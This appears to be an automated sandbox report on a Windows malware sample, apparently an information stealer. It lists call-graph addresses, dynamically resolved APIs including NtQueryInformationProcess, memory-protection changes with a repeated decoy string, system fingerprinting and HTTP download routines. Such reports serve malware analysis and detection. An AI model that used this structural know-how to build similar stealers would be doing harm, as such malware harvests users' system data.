9609ab 15280->15284 15285 96a9b0 4 API calls 15281->15285 15286 96a7a0 lstrcpy 15282->15286 15283->13691 15287 951590 lstrcpy 15284->15287 15288 9608ac 15285->15288 15289 96083e 15286->15289 15290 9609f4 15287->15290 15291 96a920 3 API calls 15288->15291 15986 95fb00 15289->15986 15293 96a7a0 lstrcpy 15290->15293 15294 9608b3 15291->15294 15296 960a0d 15293->15296 15295 96a9b0 4 API calls 15294->15295 15297 9608ba 15295->15297 15298 96a7a0 lstrcpy 15296->15298 15300 96a8a0 lstrcpy 15297->15300 15299 960a28 15298->15299 16102 960030 15299->16102 15312->15280 15634 96a7a0 lstrcpy 15633->15634 15635 951683 15634->15635 15636 96a7a0 lstrcpy 15635->15636 15637 951695 15636->15637 15638 96a7a0 lstrcpy 15637->15638 15639 9516a7 15638->15639 15640 96a7a0 lstrcpy 15639->15640 15641 9515a3 15640->15641 15641->14514 15643 9547c6 15642->15643 15644 954838 lstrlen 15643->15644 15668 96aad0 15644->15668 15646 954848 InternetCrackUrlA 15647 954867 15646->15647 15647->14591 15649 959af9 LocalAlloc 15648->15649 15650 954eee 15648->15650 15649->15650 15651 959b14 CryptStringToBinaryA 15649->15651 15650->14613 15650->14615 15651->15650 15652 959b39 LocalFree 15651->15652 15652->15650 15654 96a740 lstrcpy 15653->15654 15655 968b74 15654->15655 15656 96a740 lstrcpy 15655->15656 15657 968b82 GetSystemTime 15656->15657 15659 968b99 15657->15659 15658 96a7a0 lstrcpy 15660 968bfc 15658->15660 15659->15658 15660->14607 15662 96a931 15661->15662 15663 96a988 15662->15663 15665 96a968 lstrcpy lstrcat 15662->15665 15664 96a7a0 lstrcpy 15663->15664 15666 96a994 15664->15666 15665->15663 15666->14610 15667->14725 15668->15646 15669->14735 15670->14876 15671->14878 15672->14886 15801 9677a0 15673->15801 15676 9676c6 RegOpenKeyExA 15678 9676e7 RegQueryValueExA 15676->15678 15679 967704 RegCloseKey 15676->15679 15677 961c1e 15677->14968 15678->15679 15679->15677 15681 961c99 15680->15681 15681->14982 15683 961e09 15682->15683 15683->15024 15685 961e84 15684->15685 15686 967a9a wsprintfA 15684->15686 15685->15038 15686->15685 15688 967b4d 15687->15688 15690 961efe 15687->15690 15808 968d20 LocalAlloc CharToOemW 15688->15808 15690->15052 15692 96a740 lstrcpy 15691->15692 15693 967bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15692->15693 15702 967c25 15693->15702 15694 967c46 GetLocaleInfoA 15694->15702 15695 967d18 15696 967d1e LocalFree 15695->15696 15697 967d28 15695->15697 15696->15697 15698 96a7a0 lstrcpy 15697->15698 15701 967d37 15698->15701 15699 96a9b0 lstrcpy lstrlen lstrcpy lstrcat 15699->15702 15700 96a8a0 lstrcpy 15700->15702 15701->15065 15702->15694 15702->15695 15702->15699 15702->15700 15704 962008 15703->15704 15704->15080 15706 9694b5 15705->15706 15707 969493 GetModuleFileNameExA CloseHandle 15705->15707 15708 96a740 lstrcpy 15706->15708 15707->15706 15709 962091 15708->15709 15709->15095 15711 962119 15710->15711 15712 967e68 RegQueryValueExA 15710->15712 15711->15109 15713 967e8e RegCloseKey 15712->15713 15713->15711 15715 967fb9 GetLogicalProcessorInformationEx 15714->15715 15716 967fd8 GetLastError 15715->15716 15717 968029 15715->15717 15718 968022 15716->15718 15726 967fe3 15716->15726 15722 9689f0 2 API calls 15717->15722 15721 962194 15718->15721 15723 9689f0 2 API calls 15718->15723 15721->15123 15724 96807b 15722->15724 15723->15721 15724->15718 15725 968084 wsprintfA 15724->15725 15725->15721 15726->15715 15726->15721 15809 9689f0 15726->15809 15812 968a10 GetProcessHeap RtlAllocateHeap 15726->15812 15728 96220f 15727->15728 15728->15137 15730 9689b0 15729->15730 15731 96814d GlobalMemoryStatusEx 15730->15731 15734 968163 __aulldiv 15731->15734 15732 96819b wsprintfA 15733 962289 15732->15733 15733->15151 15734->15732 15736 9687fb GetProcessHeap RtlAllocateHeap wsprintfA 15735->15736 15738 96a740 lstrcpy 15736->15738 15739 96230b 15738->15739 15739->15165 15741 96a740 lstrcpy 15740->15741 15747 968229 15741->15747 15742 968263 15744 96a7a0 lstrcpy 15742->15744 15743 96a9b0 lstrcpy lstrlen lstrcpy lstrcat 15743->15747 15745 9682dc 15744->15745 15745->15182 15746 96a8a0 lstrcpy 15746->15747 15747->15742 15747->15743 15747->15746 15749 96a740 lstrcpy 15748->15749 15750 96835c RegOpenKeyExA 15749->15750 15751 9683d0 15750->15751 15752 9683ae 15750->15752 15754 968613 RegCloseKey 15751->15754 15755 9683f8 RegEnumKeyExA 15751->15755 15753 96a7a0 lstrcpy 15752->15753 15765 9683bd 15753->15765 15758 96a7a0 lstrcpy 15754->15758 15756 96860e 15755->15756 15757 96843f wsprintfA RegOpenKeyExA 15755->15757 15756->15754 15759 968485 RegCloseKey RegCloseKey 15757->15759 15760 9684c1 RegQueryValueExA 15757->15760 15758->15765 15761 96a7a0 lstrcpy 15759->15761 15762 968601 RegCloseKey 15760->15762 15763 9684fa lstrlen 15760->15763 15761->15765 15762->15756 15763->15762 15764 968510 15763->15764 15766 96a9b0 4 API calls 15764->15766 15765->15208 15767 968527 15766->15767 15768 96a8a0 lstrcpy 15767->15768 15769 968533 15768->15769 15770 96a9b0 4 API calls 15769->15770 15771 968557 15770->15771 15772 96a8a0 lstrcpy 15771->15772 15773 968563 15772->15773 15774 96856e RegQueryValueExA 15773->15774 15774->15762 15775 9685a3 15774->15775 15776 96a9b0 4 API calls 15775->15776 15777 9685ba 15776->15777 15778 96a8a0 lstrcpy 15777->15778 15779 9685c6 15778->15779 15780 96a9b0 4 API calls 15779->15780 15781 9685ea 15780->15781 15782 96a8a0 lstrcpy 15781->15782 15783 9685f6 15782->15783 15783->15762 15785 96a740 lstrcpy 15784->15785 15786 9686bc CreateToolhelp32Snapshot Process32First 15785->15786 15787 96875d CloseHandle 15786->15787 15788 9686e8 Process32Next 15786->15788 15789 96a7a0 lstrcpy 15787->15789 15788->15787 15793 9686fd 15788->15793 15790 968776 15789->15790 15790->15240 15791 96a9b0 lstrcpy lstrlen lstrcpy lstrcat 15791->15793 15792 96a8a0 lstrcpy 15792->15793 15793->15788 15793->15791 15793->15792 15795 96a7a0 lstrcpy 15794->15795 15796 9651b5 15795->15796 15797 951590 lstrcpy 15796->15797 15798 9651c6 15797->15798 15813 955100 15798->15813 15800 9651cf 15800->15252 15804 967720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15801->15804 15803 9676b9 15803->15676 15803->15677 15805 967765 RegQueryValueExA 15804->15805 15806 967780 RegCloseKey 15804->15806 15805->15806 15807 967793 15806->15807 15807->15803 15808->15690 15810 968a0c 15809->15810 15811 9689f9 GetProcessHeap HeapFree 15809->15811 15810->15726 15811->15810 15812->15726 15814 96a7a0 lstrcpy 15813->15814 15815 955119 15814->15815 15816 9547b0 2 API calls 15815->15816 15817 955125 15816->15817 15973 968ea0 15817->15973 15819 955184 15820 955192 lstrlen 15819->15820 15821 9551a5 15820->15821 15822 968ea0 4 API calls 15821->15822 15823 9551b6 15822->15823 15824 96a740 lstrcpy 15823->15824 15825 9551c9 15824->15825 15826 96a740 lstrcpy 15825->15826 15827 9551d6 15826->15827 15828 96a740 lstrcpy 15827->15828 15829 9551e3 15828->15829 15830 96a740 lstrcpy 15829->15830 15831 9551f0 15830->15831 15832 96a740 lstrcpy 15831->15832 15833 9551fd InternetOpenA StrCmpCA 15832->15833 15834 95522f 15833->15834 15835 9558c4 InternetCloseHandle 15834->15835 15836 968b60 3 API calls 15834->15836 15842 9558d9 ctype 15835->15842 15837 95524e 15836->15837 15838 96a920 3 API calls 15837->15838 15839 955261 15838->15839 15840 96a8a0 lstrcpy 15839->15840 15841 95526a 15840->15841 15843 96a9b0 4 API calls 15841->15843 15845 96a7a0 lstrcpy 15842->15845 15844 9552ab 15843->15844 15846 96a920 3 API calls 15844->15846 15854 955913 15845->15854 15847 9552b2 15846->15847 15848 96a9b0 4 API calls 15847->15848 15849 9552b9 15848->15849 15850 96a8a0 lstrcpy 15849->15850 15851 9552c2 15850->15851 15852 96a9b0 4 API calls 15851->15852 15853 955303 15852->15853 15855 96a920 3 API calls 15853->15855 15854->15800 15856 95530a 15855->15856 15857 96a8a0 lstrcpy 15856->15857 15858 955313 15857->15858 15859 955329 InternetConnectA 15858->15859 15859->15835 15860 955359 HttpOpenRequestA 15859->15860 15862 9558b7 InternetCloseHandle 15860->15862 15863 9553b7 15860->15863 15862->15835 15864 96a9b0 4 API calls 15863->15864 15865 9553cb 15864->15865 15866 96a8a0 lstrcpy 15865->15866 15867 9553d4 15866->15867 15868 96a920 3 API calls 15867->15868 15869 9553f2 15868->15869 15870 96a8a0 lstrcpy 15869->15870 15871 9553fb 15870->15871 15872 96a9b0 4 API calls 15871->15872 15873 95541a 15872->15873 15874 96a8a0 lstrcpy 15873->15874 15875 955423 15874->15875 15876 96a9b0 4 API calls 15875->15876 15877 955444 15876->15877 15878 96a8a0 lstrcpy 15877->15878 15879 95544d 15878->15879 15880 96a9b0 4 API calls 15879->15880 15881 95546e 15880->15881 15882 96a8a0 lstrcpy 15881->15882 15974 968ead CryptBinaryToStringA 15973->15974 15975 968ea9 15973->15975 15974->15975 15976 968ece GetProcessHeap RtlAllocateHeap 15974->15976 15975->15819 15976->15975 15977 968ef4 ctype 15976->15977 15978 968f05 CryptBinaryToStringA 15977->15978 15978->15975 15982->15255 16225 959880 15983->16225 15985 9598e1 15985->15262 15987 96a740 lstrcpy 15986->15987 15988 95fb16 15987->15988 16160 96a740 lstrcpy 16159->16160 16161 960266 16160->16161 16162 968de0 2 API calls 16161->16162 16163 96027b 16162->16163 16164 96a920 3 API calls 16163->16164 16165 96028b 16164->16165 16166 96a8a0 lstrcpy 16165->16166 16167 960294 16166->16167 16168 96a9b0 4 API calls 16167->16168 16169 9602b8 16168->16169 16226 95988e 16225->16226 16229 956fb0 16226->16229 16228 9598ad ctype 16228->15985 16232 956d40 16229->16232 16233 956d63 16232->16233 16240 956d59 16232->16240 16233->16240 16246 956660 16233->16246 16235 956dbe 16235->16240 16252 9569b0 16235->16252 16237 956e2a 16238 956ee6 VirtualFree 16237->16238 16237->16240 16241 956ef7 16237->16241 16238->16241 16239 956f41 16239->16240 16242 9689f0 2 API calls 16239->16242 16240->16228 16241->16239 16243 956f26 FreeLibrary 16241->16243 16244 956f38 16241->16244 16242->16240 16243->16241 16245 9689f0 2 API calls 16244->16245 16245->16239 16249 95668f VirtualAlloc 16246->16249 16248 956730 16250 956743 VirtualAlloc 16248->16250 16251 95673c 16248->16251 16249->16248 16249->16251 16250->16251 16251->16235 16253 9569c9 16252->16253 16257 9569d5 16252->16257 16254 956a09 LoadLibraryA 16253->16254 16253->16257 16255 956a32 16254->16255 16254->16257 16259 956ae0 16255->16259 16262 968a10 GetProcessHeap RtlAllocateHeap 16255->16262 16257->16237 16258 956ba8 GetProcAddress 16258->16257 16258->16259 16259->16257 16259->16258 16260 9689f0 2 API calls 16260->16259 16261 956a8b 16261->16257 16261->16260 16262->16261

                    Executed Functions

                    Function 00969860 Relevance: 79.0, APIs: 33, Strings: 12, Instructions: 212libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 660 969860-969874 call 969750 663 969a93-969af2 LoadLibraryA * 5 660->663 664 96987a-969a8e call 969780 GetProcAddress * 21 660->664 665 969af4-969b08 GetProcAddress 663->665 666 969b0d-969b14 663->666 664->663 665->666 668 969b46-969b4d 666->668 669 969b16-969b41 GetProcAddress * 2 666->669 671 969b4f-969b63 GetProcAddress 668->671 672 969b68-969b6f 668->672 669->668 671->672 673 969b71-969b84 GetProcAddress 672->673 674 969b89-969b90 672->674 673->674 675 969b92-969bbc GetProcAddress * 2 674->675 676 969bc1-969bc2 674->676 675->676
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,005B24A0), ref: 009698A1
                    • GetProcAddress.KERNEL32(74DD0000,005B2440), ref: 009698BA
                    • GetProcAddress.KERNEL32(74DD0000,005B2218), ref: 009698D2
                    • GetProcAddress.KERNEL32(74DD0000,005B2458), ref: 009698EA
                    • GetProcAddress.KERNEL32(74DD0000,005B23C8), ref: 00969903
                    • GetProcAddress.KERNEL32(74DD0000,005B8FA8), ref: 0096991B
                    • GetProcAddress.KERNEL32(74DD0000,005A5AD0), ref: 00969933
                    • GetProcAddress.KERNEL32(74DD0000,005A5AF0), ref: 0096994C
                    • GetProcAddress.KERNEL32(74DD0000,005B2350), ref: 00969964
                    • GetProcAddress.KERNEL32(74DD0000,005B2470), ref: 0096997C
                    • GetProcAddress.KERNEL32(74DD0000,005B24D0), ref: 00969995
                    • GetProcAddress.KERNEL32(74DD0000,005B2488), ref: 009699AD
                    • GetProcAddress.KERNEL32(74DD0000,005A5BB0), ref: 009699C5
                    • GetProcAddress.KERNEL32(74DD0000,005B24B8), ref: 009699DE
                    • GetProcAddress.KERNEL32(74DD0000,005B2380), ref: 009699F6
                    • GetProcAddress.KERNEL32(74DD0000,005A5B10), ref: 00969A0E
                    • GetProcAddress.KERNEL32(74DD0000,005B22D8), ref: 00969A27
                    • GetProcAddress.KERNEL32(74DD0000,005B2248), ref: 00969A3F
                    • GetProcAddress.KERNEL32(74DD0000,005A5DD0), ref: 00969A57
                    • GetProcAddress.KERNEL32(74DD0000,005B22F0), ref: 00969A70
                    • GetProcAddress.KERNEL32(74DD0000,005A5BD0), ref: 00969A88
                    • LoadLibraryA.KERNEL32(005B2578,?,00966A00), ref: 00969A9A
                    • LoadLibraryA.KERNEL32(005B2530,?,00966A00), ref: 00969AAB
                    • LoadLibraryA.KERNEL32(005B25D8,?,00966A00), ref: 00969ABD
                    • LoadLibraryA.KERNEL32(005B25C0,?,00966A00), ref: 00969ACF
                    • LoadLibraryA.KERNEL32(005B2518,?,00966A00), ref: 00969AE0
                    • GetProcAddress.KERNEL32(75A70000,005B2560), ref: 00969B02
                    • GetProcAddress.KERNEL32(75290000,005B2590), ref: 00969B23
                    • GetProcAddress.KERNEL32(75290000,005B2548), ref: 00969B3B
                    • GetProcAddress.KERNEL32(75BD0000,005B25A8), ref: 00969B5D
                    • GetProcAddress.KERNEL32(75450000,005A5D70), ref: 00969B7E
                    • GetProcAddress.KERNEL32(76E90000,005B9018), ref: 00969B9F
                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00969BB6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: 0%[$@$[$H"[$H%[$NtQueryInformationProcess$P#[$X$[$`%[$h#[$p$[$p]Z$x%[
                    • API String ID: 2238633743-4253535198
                    • Opcode ID: 89765a3c5e9bb70d55f735cdc1102e0b94d209f34447d4bec315f06a5d448515
                    • Instruction ID: 8ce1d8a2f4ebd338933356f594560a32fa8634dd7b4b910a777b572fe37a17c5
                    • Opcode Fuzzy Hash: 89765a3c5e9bb70d55f735cdc1102e0b94d209f34447d4bec315f06a5d448515
                    • Instruction Fuzzy Hash: D1A12BB55102409FD344EFA9EF89A663BF9F78D301714851BA609C3274DE39A841CBE3
                    Function 009545C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 764 9545c0-954695 RtlAllocateHeap 781 9546a0-9546a6 764->781 782 9546ac-95474a 781->782 783 95474f-9547a9 VirtualProtect 781->783 782->781
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0095460F
                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0095479C
                    Strings
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954765
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0095466D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954622
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954657
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0095471E
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954713
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009545DD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0095475A
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009546D8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009545D2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0095473F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954678
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954770
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954617
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009546B7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954638
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954683
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009546C2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009546CD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009545E8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954662
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954734
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009546AC
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0095462D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0095474F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0095477B
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009545C7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954729
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009545F3
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00954643
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeapProtectVirtual
                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 1542196881-2218711628
                    • Opcode ID: 0a44135ab0eb62a8701c41f34df6752697aa2cbe86868db51936298af61303d4
                    • Instruction ID: d6eb90a5debfa2df6c81b51b45a777d1b29bd664fe99282bab39d9fd7d6ac8da
                    • Opcode Fuzzy Hash: 0a44135ab0eb62a8701c41f34df6752697aa2cbe86868db51936298af61303d4
                    • Instruction Fuzzy Hash: 4B4136616C360CAAE674B7A68847EEF77539FC271EF529840A8C862290CFF065085793
                    Function 00956280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954839
                      • Part of subcall function 009547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00954849
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • InternetOpenA.WININET(00970DFE,00000001,00000000,00000000,00000000), ref: 009562E1
                    • StrCmpCA.SHLWAPI(?,005BE8F8), ref: 00956303
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00956335
                    • HttpOpenRequestA.WININET(00000000,GET,?,005BE380,00000000,00000000,00400100,00000000), ref: 00956385
                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009563BF
                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009563D1
                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009563FD
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0095646D
                    • InternetCloseHandle.WININET(00000000), ref: 009564EF
                    • InternetCloseHandle.WININET(00000000), ref: 009564F9
                    • InternetCloseHandle.WININET(00000000), ref: 00956503
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
